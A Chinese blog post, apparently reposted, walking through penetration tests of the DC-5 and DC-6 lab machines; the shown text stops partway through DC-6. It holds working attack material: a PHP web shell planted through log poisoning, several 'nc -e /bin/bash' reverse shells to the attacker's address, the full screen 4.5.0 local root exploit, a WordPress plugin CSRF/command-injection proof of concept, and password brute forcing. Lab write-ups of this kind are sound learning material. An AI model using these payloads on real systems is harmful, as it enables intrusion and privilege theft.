
<!DOCTYPE html>
<html lang class="loading">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>DC-5至DC-8靶机渗透测试 - Knlvre</title>
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate">
    <meta name="keywords" content="TriDiamond Obsidian,"> 
    <meta name="description" content="前言由于网络环境的变化，攻击机和靶机的IP可能发生改变。在每道题目中如果有改变，我会在开头的环境中写出来
转载自安全客原文：https://www.anquanke.com/post/id/1878,"> 
    <meta name="author" content="Knlvre"> 
    <link rel="alternative" href="atom.xml" title="Knlvre" type="application/atom+xml"> 
    <link rel="icon" href="/knlvre.github.io/img/favicon.png"> 
    <link href="https://fonts.loli.net/css?family=Roboto+Mono|Rubik&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="//at.alicdn.com/t/font_1429596_nzgqgvnmkjb.css">
    <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.7.2/animate.min.css">
    <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">
    <link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/codemirror.min.css">
    <link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/theme/dracula.css">
    <link rel="stylesheet" href="/knlvre.github.io/css/obsidian.css">
    <link rel="stylesheet" href="/knlvre.github.io/css/ball-atom.min.css">
</head>
</html>

<body class="loading">
    <div class="loader">
        <div class="la-ball-atom la-2x">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
    <span id="config-title" style="display:none">Knlvre</span>
    <div id="loader"></div>
    <div id="single">
    <div class="scrollbar gradient-bg-rev"></div>
<div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <div class="navigation animated fadeIn fast delay-1s">
        <img id="home-icon" class="icon-home" src="/img/favicon.png" alt="" data-url="https://knlvre.github.io">
        <div id="play-icon" title="Play/Pause" class="iconfont icon-play"></div>
        <h3 class="subtitle">DC-5至DC-8靶机渗透测试</h3>
        <div class="social">
            <!--        <div class="like-icon">-->
            <!--            <a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
            <!--        </div>-->
            <div>
                <div class="share">
                    
                        <a href="javascript:;" class="iconfont icon-share1"></a>
                        <div class="share-component-cc" data-disabled="facebook,douban,linkedin,diandian,tencent,google"></div>
                    
                </div>
            </div>
        </div>
    </div>
</div>

    <div class="section">
        <div class=article-header-wrapper>
    <div class="article-header">
        <div class="article-cover animated fadeIn" style="
            animation-delay: 600ms;
            animation-duration: 1.2s;
            background-image: 
                radial-gradient(ellipse closest-side, rgba(0, 0, 0, 0.65), #100e17),
                url(/img/cover.jpg);">
        </div>
        <div class="else">
            <p class="animated fadeInDown">
                
                <a href="javascript:;"><b>「 </b>Article<b> 」</b></a>
                
                September 18, 2019
            </p>
            <h3 class="post-title animated fadeInDown"><a href="/knlvre.github.io/2019/09/18/DC5-DC8靶机渗透测试/" title="DC-5至DC-8靶机渗透测试">DC-5至DC-8靶机渗透测试</a>
            </h3>
            
            <p class="post-count animated fadeInDown">
                
                <span>
                    <b class="iconfont icon-text2"></b> <i>Words count</i>
                    51k
                </span>
                
                
                <span>
                    <b class="iconfont icon-timer__s"></b> <i>Reading time</i>
                    46 mins.
                </span>
                
                
                
                <span id="busuanzi_container_page_pv">
                    <b class="iconfont icon-read"></b> <i>Read count</i>
                    <span id="busuanzi_value_page_pv">0</span>
                </span>
                
            </p>
            
            
            <ul class="animated fadeInDown post-tags-list"><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/knlvre.github.io/tags/渗透测试/">渗透测试</a></li></ul>
            
        </div>
    </div>
</div>

<div class="screen-gradient-after">
    <div class="screen-gradient-content">
        <div class="screen-gradient-content-inside">
            <div class="bold-underline-links screen-gradient-sponsor">
                <p>
                    <span class="animated fadeIn delay-1s"></span>
                </p>
            </div>
        </div>
    </div>
</div>

<div class="article">
    <div class='main'>
        <div class="content markdown animated fadeIn">
            <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>由于网络环境的变化，攻击机和靶机的IP可能发生改变。在每道题目中如果有改变，我会在开头的环境中写出来</p>
<p>转载自安全客原文：<a href="https://www.anquanke.com/post/id/187876" target="_blank" rel="noopener">https://www.anquanke.com/post/id/187876</a></p>
<h1 id="DC-5"><a href="#DC-5" class="headerlink" title="DC-5"></a>DC-5</h1><h2 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h2><p>虚拟机平台：VMware Workstation Pro</p>
<p>攻击机：Kali（IP：192.168.43.84）</p>
<p>靶机：DC-5（IP：192.168.43.241）</p>
<h2 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>渗透测试</h2><p>扫到IP之后，继续扫端口，开放<code>80</code>、<code>111</code>和<code>45549</code>端口</p>
<pre><code>root@Knlvre:~# nmap -A -p- 192.168.43.241
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-24 10:21 CST
Nmap scan report for dc-5 (192.168.43.241)
Host is up (0.00066s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37784/udp   status
|   100024  1          38492/udp6  status
|   100024  1          45579/tcp   status
|_  100024  1          46752/tcp6  status
45579/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:ED:57:59 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.65 ms dc-5 (192.168.43.241)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.52 seconds
</code></pre><p>访问80端口，其他页面没有什么有用信息，<code>contact.php</code>页可以提交表单，表单提交到<code>thankyou.php</code>，测试Sql注入和XSS都不存在，扫目录也没有结果。看了大佬文章，目录扫出了<code>footer.php</code>，并且发现<code>thankyou.php</code>的<code>footer</code>每次访问都会改变，直接访问<code>footer.php</code>也是这样，年份在改变</p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/5-1.png" alt="5-1"></p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/5-2.png" alt="5-2"></p>
<p>猜测这里是直接调用了<code>footer.php</code>（这里是直接调用，不是写在底部，因为跟 上面一样，每次访问年份都在变化）。应该是使用<code>include()</code>函数来包含了 <code>footer.php</code>文件，这样直接导致了LFI漏洞，下面我们来测试一下漏洞是否真的存在和看一下是否会过滤包含进来的文件，直接用<code>GET</code>加<code>file参数</code></p>
<pre><code>http://192.168.43.241/thankyou.php?file=/etc/passwd
</code></pre><p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/5-3.png" alt="5-3"></p>
<p>前面nmap的结果来看，中间件是<code>nginx</code>。并且因为网站的访问记录都会被写入日志当中，所以我们当前访问<code>/var/log/nginx/access.log</code>，可以访问</p>
<pre><code>http://192.168.43.241/thankyou.php?file=/var/log/nginx/access.log
</code></pre><p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/5-4.png" alt="5-4"></p>
<p>可以看到访问记录都被写进去了，那么我们就可以利用这个写马</p>
<p>Ps：此处不知道为什么不能用<code>eval()函数</code>，写入后没反应</p>
<pre><code>&lt;?php passthru($_GET[&#39;cmd&#39;]); ?&gt;
</code></pre><p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/5-5.png" alt="5-5"></p>
<p>会提示<code>404 Not Found</code>，但是已经成功写入日志，测试一下</p>
<pre><code>/thankyou.php?file=/var/log/nginx/access.log&amp;cmd=id
</code></pre><p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/5-6.png" alt="5-6"></p>
<p>既然有被执行，现在就可以在攻击机监听端口，靶机那边主动连接</p>
<pre><code>#攻击机
root@Knlvre:~# nc -lvp 3737
listening on [any] 3737 ...

#靶机
/thankyou.php?file=/var/log/nginx/access.log&amp;cmd=nc -e /bin/bash 192.168.199.133 3737
</code></pre><p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/5-7.png" alt="5-7"></p>
<p>拿到shell之后还只是www的权限，没有找到任何线索，<code>root</code>照样进不去，准备提权。python拿到交互式shell</p>
<pre><code>python -c &quot;import pty;pty.spawn(&#39;/bin/bash&#39;)&quot;
www-data@dc-5:~/html$ 
</code></pre><p>参考别人文章，下载了一款Linux越权检查工具到<code>/tmp</code>目录下，如下</p>
<p>Ps：或者下载到Kali内，以后上传到靶机</p>
<pre><code>wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
wget https://www.securitysift.com/download/linuxprivchecker.py

#使用方法：两个都下载完之后，python linuxprivchecker.py，就可以了
</code></pre><p>工具跑完之后给出了很多内容，我们这里关注到<code>SUID文件</code>部分，这里的<code>screen</code>可利用</p>
<pre><code>[+] SUID/SGID Files and Directories
    -rwsr-xr-x 1 root root 40168 May 18  2017 /bin/su
    -rwsr-xr-x 1 root root 40000 Mar 30  2015 /bin/mount
    -rwsr-xr-x 1 root root 27416 Mar 30  2015 /bin/umount
    -rwsr-xr-x 1 root root 1441352 Apr 19 23:48 /bin/screen-4.5.0
    drwxr-s--- 2 mysql adm 4096 Apr 19 23:41 /var/log/mysql
    drwxr-s--- 2 Debian-exim adm 4096 Apr 19 23:33 /var/log/exim4
    ...
    ...
    ...
</code></pre><p><code>searchsploit</code>搜索<code>screen</code>，用这个<code>exploits/linux/local/41154.sh</code>，查看内容</p>
<pre><code>root@Knlvre:~/screen# cat 41154.sh 
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo &quot;~ gnu/screenroot ~&quot;
echo &quot;[+] First, we create our shell and library...&quot;
cat &lt;&lt; EOF &gt; /tmp/libhax.c
#include &lt;stdio.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;unistd.h&gt;
__attribute__ ((__constructor__))
void dropshell(void){
    chown(&quot;/tmp/rootshell&quot;, 0, 0);
    chmod(&quot;/tmp/rootshell&quot;, 04755);
    unlink(&quot;/etc/ld.so.preload&quot;);
    printf(&quot;[+] done!\n&quot;);
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat &lt;&lt; EOF &gt; /tmp/rootshell.c
#include &lt;stdio.h&gt;
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp(&quot;/bin/sh&quot;, NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo &quot;[+] Now we create our /etc/ld.so.preload file...&quot;
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  &quot;\x0a/tmp/libhax.so&quot; # newline needed
echo &quot;[+] Triggering...&quot;
screen -ls # screen itself is setuid, so... 
/tmp/rootshell
</code></pre><p>但是脚本是错的，运行需要执行一些步骤：</p>
<p>①将上面这个bash文件的内容单独复制出来，写入<code>libhax.c</code>文件，然后执行如下命令（记得更改文件路径），会生成一个<code>libhax.so</code></p>
<pre><code>root@Knlvre:~/screen# vi libhax.c

root@Knlvre:~/screen# cat libhax.c 
#include &lt;stdio.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;unistd.h&gt;
__attribute__ ((__constructor__))
void dropshell(void){
    chown(&quot;/tmp/rootshell&quot;, 0, 0);
    chmod(&quot;/tmp/rootshell&quot;, 04755);
    unlink(&quot;/etc/ld.so.preload&quot;);
    printf(&quot;[+] done!\n&quot;);
}
</code></pre><p>②把另一段也复制出来，写入<code>rootshell.c</code>，执行如下命令（同样记得修改路径），会生成一个<code>rootshell</code>文件</p>
<pre><code>root@Knlvre:~/screen# vi rootshell.c

root@Knlvre:~/screen# cat rootshell.c 
#include &lt;stdio.h&gt;
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp(&quot;/bin/sh&quot;, NULL, NULL);
}
</code></pre><p>编译文件</p>
<pre><code>root@Knlvre:~/screen# gcc -fPIC -shared -ldl -o ./libhax.so ./libhax.c
./libhax.c: In function ‘dropshell’:
./libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
    7 |     chmod(&quot;/tmp/rootshell&quot;, 04755);
      |     ^~~~~


root@Knlvre:~/screen# gcc -o ./rootshell ./rootshell.c
./rootshell.c: In function ‘main’:
./rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    3 |     setuid(0);
      |     ^~~~~~
...
...
</code></pre><p>修改完之后，需要将这2个文件上传到靶机的<code>/tmp</code>目录下，新学到两种方法：</p>
<p>方法一：利用Python</p>
<p>在服务器端如果拥有Python2环境，可以将<code>当前目录</code>作为根目录，临时搭建一个<code>Web服务器</code>，可以自己指定<code>端口</code>，命令如下</p>
<pre><code>python2 -m SimpleHTTPServer [端口]

#Python3环境下：python3 -m http.server [端口]
</code></pre><p>以本次为例</p>
<p>攻击机端：</p>
<pre><code>root@Knlvre:~/screen# python -m SimpleHTTPServer 7373
Serving HTTP on 0.0.0.0 port 7373 ...
</code></pre><p>靶机端：</p>
<pre><code>www-data@dc-5:/tmp$ wget http://192.168.199.133:7373/libhax.so         
wget http://192.168.199.133:7373/dc5.sh
converted &#39;http://192.168.199.133:7373/dc5.sh&#39; (ANSI_X3.4-1968) -&gt; &#39;http://192.168.199.133:7373/dc5.sh&#39; (UTF-8)
--2019-09-25 03:23:03--  http://192.168.199.133:7373/dc5.sh
Connecting to 192.168.199.133:7373... connected.
HTTP request sent, awaiting response... 200 OK
Length: 267 [text/x-sh]
Saving to: &#39;dc5.sh&#39;

dc5.sh              100%[=====================&gt;]     267  --.-KB/s   in 0s     

2019-09-25 03:23:03 (29.0 MB/s) - &#39;dc5.sh&#39; saved [267/267]
</code></pre><p>传输完成后，服务器端也会有反馈</p>
<pre><code>root@Knlvre:~/screen# python -m SimpleHTTPServer 7373
Serving HTTP on 0.0.0.0 port 7373 ...
192.168.199.153 - - [24/Sep/2019 18:30:43] &quot;GET /libhax.so HTTP/1.1&quot; 200 -
</code></pre><p>方法二：利用nc</p>
<p>攻击机端：</p>
<pre><code>nc -lnvp 7373 &lt; /root/screen/libhax.so -q 1
#-q 参数表示获取文件后1秒关闭

root@Knlvre:~/screen# nc -lnvp 7373 &lt; /root/screen/libhax.so -q 1
listening on [any] 7373 ...
</code></pre><p>靶机端：</p>
<pre><code>nc 192.168.199.133 7373 &gt; libhax.so
</code></pre><p>传输完成后，服务器端也会有反馈</p>
<pre><code>root@Knlvre:~/screen# nc -lnvp 7373 &lt; /root/screen/libhax.so -q 1
listening on [any] 7373 ...
connect to [192.168.199.133] from (UNKNOWN) [192.168.199.153] 58647
</code></pre><p>结束</p>
<p>将<code>libhax.so、rootshell</code>下载到<code>/tmp</code>目录下之后</p>
<pre><code>www-data@dc-5:/tmp$ ls
libhax.so  rootshell
</code></pre><p>还是照着脚本说的做，提权成功</p>
<pre><code>www-data@dc-5:/tmp$ cd /etc 

www-data@dc-5:/etc$ umask 000

www-data@dc-5:/etc$ screen -D -m -L ld.so.preload echo -ne  &quot;\x0a/tmp/libhax.so&quot;

www-data@dc-5:/etc$ screen -ls
&#39; from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

www-data@dc-5:/etc$ /tmp/rootshell
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
</code></pre><p>查找并查看flag，通关</p>
<pre><code># find / -name &quot;*flag*&quot;
/var/lib/mysql/debian-5.5.flag
...
...
/usr/lib/x86_64-linux-gnu/perl/5.20.2/bits/waitflags.ph
/root/thisistheflag.txt

# cat /root/thisistheflag.txt


888b    888 d8b                                                      888      888 888 888 
8888b   888 Y8P                                                      888      888 888 888 
88888b  888                                                          888      888 888 888 
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 
888 Y88b888 888 d88P&quot;   d8P  Y8b      888  888  888 d88&quot;&quot;88b 888P&quot;   888 .88P 888 888 888 
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 &quot;88b  &quot;   &quot;   &quot;  
888    Y888 888  &quot;Y8888P &quot;Y8888        &quot;Y8888888P&quot;   &quot;Y88P&quot;  888     888  888 888 888 888 




Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it&#39;s all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

# 
</code></pre><h1 id="DC-6"><a href="#DC-6" class="headerlink" title="DC-6"></a>DC-6</h1><h2 id="环境-1"><a href="#环境-1" class="headerlink" title="环境"></a>环境</h2><p>虚拟机平台：VMware Workstation Pro</p>
<p>攻击机：Kali（IP：192.168.199.133）</p>
<p>靶机：DC-6（IP：192.168.199.107）</p>
<h2 id="渗透测试-1"><a href="#渗透测试-1" class="headerlink" title="渗透测试"></a>渗透测试</h2><p><code>nmap</code>扫描IP，开放<code>22</code>和<code>80</code>端口，但是访问80却发现解析不了，仔细一看，又是重定向问题</p>
<pre><code>root@Knlvre:/~# nmap -p- -A 192.168.199.107
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 17:54 CST
Nmap scan report for dc-6.lan (192.168.199.107)
Host is up (0.00081s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:D5:AC:59 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
...
...
</code></pre><p>继续修改<code>hosts</code>，添加如下记录</p>
<pre><code>192.168.199.107    wordy
</code></pre><p>添加完之后重新访问就可以了，又是<code>WordPress</code>。继续用<code>wpscan</code>扫描用户</p>
<pre><code>root@Knlvre:/~# wpscan --url http://wordy/ -e u
...
...

[i] User(s) Identified:

[+] admin
 | Detected By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&amp;page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] sarah
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
...
...
</code></pre><p><code>cewl</code>抓关键词</p>
<pre><code>root@Knlvre:/~# cewl http://wordy -w passwords_dc6.txt
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
</code></pre><p><code>wpscan</code>爆破用户名密码</p>
<pre><code>root@Knlvre:/~# wpscan --url http://wordy/ -U users_dc6.txt -P passwords_dc6.txt
</code></pre><p>不是很顺利，爆破没有结果。想要用<code>rockyou.txt</code>爆破，但是记录是在太多了，猴年马月才能爆破完，所以这个时候，官网给了提示</p>
<blockquote>
<p>OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.</p>
<p>cat /usr/share/wordlists/rockyou.txt | grep k01 &gt; passwords.txt That should save you a few years. ;-)</p>
</blockquote>
<p> 就按照提示生成密码文本</p>
<pre><code>root@Knlvre:/~# cat /usr/share/wordlists/rockyou.txt | grep k01 &gt; passwords_dc6.txt

root@Knlvre:/~# wc -l passwords_dc6.txt
2668 passwords_dc6
</code></pre><p>然后再次爆破</p>
<pre><code>root@Knlvre:/~# wpscan --url http://wordy/ -U users_dc6 -P passwords_dc6
...
...
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - mark / helpdesk01
...
...

</code></pre><blockquote>
<p>用户名：mark</p>
<p>密码：helpdesk01</p>
</blockquote>
<p>进入后台之后没有发现，继续按照之前的方法去尝试<code>ssh</code>，看<code>mark</code>会不会重复使用这个密码，但是无果</p>
<pre><code>root@Knlvre:~# ssh mark@192.168.199.107
The authenticity of host &#39;192.168.199.107 (192.168.199.107)&#39; can&#39;t be established.
ECDSA key fingerprint is SHA256:jlerdCouZvnDhR/1oNiOrfqqzChsDT0gm8uG96kRY2U.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added &#39;192.168.199.107&#39; (ECDSA) to the list of known hosts.
mark@192.168.199.107&#39;s password: 
Permission denied, please try again.
</code></pre><p>继续回到网页，然后发现了网页中的一款插件<code>Activity monitor</code></p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/6-1.png" alt="6-1"></p>
<p><code>searchsploit</code>搜索关键词<code>wordpress activity monitor</code></p>
<pre><code>root@Knlvre:/~# searchsploit wordpress activity monitor
------------------------------------------- ----------------------------------------
 Exploit Title                              |  Path
                                           | (/usr/share/exploitdb/)
------------------------------------------- ----------------------------------------
WordPress Plugin Plainview ...               | exploits/php/webapps/45274.html
------------------------------------------- ----------------------------------------
Shellcodes: No Result


root@Knlvre:/~# searchsploit -m exploits/php/webapps/45274.html
  Exploit: WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection
      URL: https://www.exploit-db.com/exploits/45274
     Path: /usr/share/exploitdb/exploits/php/webapps/45274.html
File Type: HTML document, ASCII text, with CRLF line terminators
Copied to: /var/www/html/45274.html
</code></pre><p>查看<code>45274.html</code></p>
<pre><code class="html">root@Knlvre:/~# cat 45274.html 
&lt;!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)

Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list

Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.

References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/

PoC:
--&gt;

&lt;html&gt;
  &lt;!--  Wordpress Plainview Activity Monitor RCE
        [+] Version: 20161228 and possibly prior
        [+] Description: Combine OS Commanding and CSRF to get reverse shell
        [+] Author: LydA(c)ric LEFEBVRE
        [+] CVE-ID: CVE-2018-15877
        [+] Usage: Replace 127.0.0.1 &amp; 9999 with you ip and port to get reverse shell
        [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
  --&gt;
  &lt;body&gt;
  &lt;script&gt;history.pushState(&#39;&#39;, &#39;&#39;, &#39;/&#39;)&lt;/script&gt;
    &lt;form action=&quot;http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&amp;tab=activity_tools&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;ip&quot; value=&quot;google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;lookup&quot; value=&quot;Lookup&quot; /&gt;
      &lt;input type=&quot;submit&quot; value=&quot;Submit request&quot; /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;
</code></pre>
<p>根据提示，我们修改部分内容：</p>
<pre><code class="html">...
&lt;body&gt;
  &lt;script&gt;history.pushState(&#39;&#39;, &#39;&#39;, &#39;/&#39;)&lt;/script&gt;
    &lt;form action=&quot;http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&amp;tab=activity_tools&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;ip&quot; value=&quot;google.fr| nc -e /bin/bash 192.168.199.133 3737&quot; /&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;lookup&quot; value=&quot;Lookup&quot; /&gt;
      &lt;input type=&quot;submit&quot; value=&quot;Submit request&quot; /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;
...
</code></pre>
<p>然后现在攻击机这段开启端口监听</p>
<pre><code>root@Knlvre:~# nc -lvnp 3737
listening on [any] 3737 ...
</code></pre><p>再去访问<code>http://127.0.0.1/45274.html</code>，点击<code>Submit request</code></p>
<p><img src="https://raw.githubusercontent.com/Knlvre/Knlvre.github-io/master/img/DC/6-2.png" alt="6-2"></p>
<p>就这样返回了shell</p>
<pre><code>root@Knlvre:~# nc -lvnp 3737
listening on [any] 3737 ...
connect to [192.168.199.133] from (UNKNOWN) [192.168.199.107] 53980
python -c &quot;import pty;pty.spawn(&#39;/bin/bash&#39;)&quot;
www-data@dc-6:/var/www/html/wp-admin$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</code></pre><p>将提权工具<code>LinEnum</code>上传到靶机，检测后无利用点。查看<code>/home</code>目录，发现有4个目录，一一查看之后发现两个文件：①<code>/home/mark/stuff</code>目录下的<code>things-to-do.txt</code>，②<code>/home/mark/stuff</code>目录下的<code>bakups.sh</code>。查看第一个文件，提示如下</p>
<blockquote>
<p>Things to do:</p>
<ul>
<li>Restore full functionality for the hyperdrive (need to speak to Jens)</li>
<li>Buy present for Sarah’s farewell party</li>
<li>Add new user: graham - GSo7isUM1D4 - done</li>
<li>Apply for the OSCP course</li>
<li>Buy new laptop for Sarah’s replacement</li>
</ul>
</blockquote>
<p>查看第二个文件</p>
<pre><code>www-data@dc-6:/home/jens$ cat backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
</code></pre><p>提示中的用户名密码会不会是<code>ssh</code>？尝试一下，果然是</p>
<pre><code>root@Knlvre:/~# ssh graham@192.168.43.22
...
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
graham@dc-6:~$ id
uid=1001(graham) gid=1001(graham) groups=1001(graham),1005(devs)
</code></pre><p><code>sudo -l</code>后出现提示</p>
<pre><code>graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
</code></pre><blockquote>
<p>User graham may run the following commands on dc-6:<br>   (jens) NOPASSWD: /home/jens/backups.sh</p>
</blockquote>
<p>按照提示尝试运行<code>backups.sh</code>文件，就能不输入密码成为<code>jens</code>。首先，在文件中写入<code>/bin/sh</code></p>
<pre><code>graham@dc-6:/home/jens$ echo &quot;/bin/sh&quot; &gt; backups.sh
graham@dc-6:/home/jens$ cat backups.sh
/bin/sh
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
$ id
uid=1004(jens) gid=1004(jens) groups=1004(jens),1005(devs)
$ python -c &quot;import pty;pty.spawn(&#39;/bin/bash&#39;)&quot;
jens@dc-6:~$
</code></pre><p>继续查看权限，出现提示</p>
<pre><code>jens@dc-6:~$ sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap
</code></pre><blockquote>
<p>User jens may run the following commands on dc-6:<br>   (root) NOPASSWD: /usr/bin/nmap</p>
</blockquote>
<p>提示可以使用<code>nmap</code>提权，低版本(2.02-5.21)可以直接提权</p>
